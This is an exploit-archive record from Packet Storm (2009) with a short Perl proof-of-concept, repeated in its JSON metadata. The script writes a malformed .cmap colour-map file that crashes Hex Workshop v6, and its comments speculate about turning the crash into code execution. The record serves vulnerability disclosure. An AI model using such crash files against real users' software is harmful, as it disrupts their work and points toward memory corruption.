ID PACKETSTORM:74586 Type packetstorm Reporter DATA_SNIPER Modified 2009-02-03T00:00:00
Description
`#!/usr/bin/perl -w
# Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC
# Discovred by : DATA_SNIPER
# for more information vist my blog:http://datasniper.arab4services.net/
# the Exploit it's very hard to implemented,if we can make the "reference" point to valid memory location contain
# unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly).
print "==========================================================================\n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n";
print "Discovred by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "===================================================================== \n";
my $crash = '#Simple POC by DATA_SNIPER'."\n".'"%s"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :)
my $file = "cr4sh.cmap" ;
open(my $data, ">>$file") or die "Cannot open $file";
print $data $crash;
close($data);
print "$file has been created\n";
print "open it in HexWorkshop.\n";
`
{"type": "packetstorm", "published": "2009-02-03T00:00:00", "reporter": "DATA_SNIPER", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "107499d7173481bedbda279324204c35"}, {"key": "modified", "hash": "c265b459db2ad731c387726b07c37b86"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "c265b459db2ad731c387726b07c37b86"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "89ce3d1ef131b0ac78cbd7e761a08fc1"}, {"key": "sourceData", "hash": "94f444c0f9b986db2b26b70d6f35d8e9"}, {"key": "sourceHref", "hash": "3ffcc86f4945514988a5a501cf830da8"}, {"key": "title", "hash": "cf9cf6f8210a27a78412b07a3680abd1"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl -w \n# Hex Workshop v6 \"ColorMap files .cmap\" Invalid Memory Reference crash POC \n# Discovred by : DATA_SNIPER \n# for more information vist my blog:http://datasniper.arab4services.net/ \n# the Exploit it's very hard to implemented,if we can make the \"reference\" point to valid memory location contain \n# unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly). \nprint \"==========================================================================\\n\"; \nprint \"Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\\n\"; \nprint \"Discovred by DATA_SNIPER\\n\"; \nprint \"Greetz to: arab4services team and AT4RE Team\\n\"; \nprint \"===================================================================== \\n\"; \nmy $crash = '#Simple POC by DATA_SNIPER'.\"\\n\".'\"%s\"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :) \nmy $file = \"cr4sh.cmap\" ; \nopen(my $data, \">>$file\") or die \"Cannot open $file\"; \nprint $data $crash; \nclose($data); \nprint \"$file has been created\\n\"; \nprint \"open it in HexWorkshop.\\n\"; \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:16:50", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/74586/Hex-Workshop-6-.cmap-Crash-Exploit.html", "sourceHref": "https://packetstormsecurity.com/files/download/74586/hexworkshop-dos.txt", "title": "Hex Workshop 6 .cmap Crash Exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-11-03T10:16:50"}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:50"}, "vulnersScore": 0.0}, "references": [], "id": "PACKETSTORM:74586", "hash": "7d6b95ca88426347fecb3c57756fa80bd612d12184701db75b99d8ecb963831c", "edition": 1, "cvelist": [], "modified": "2009-02-03T00:00:00", "description": ""}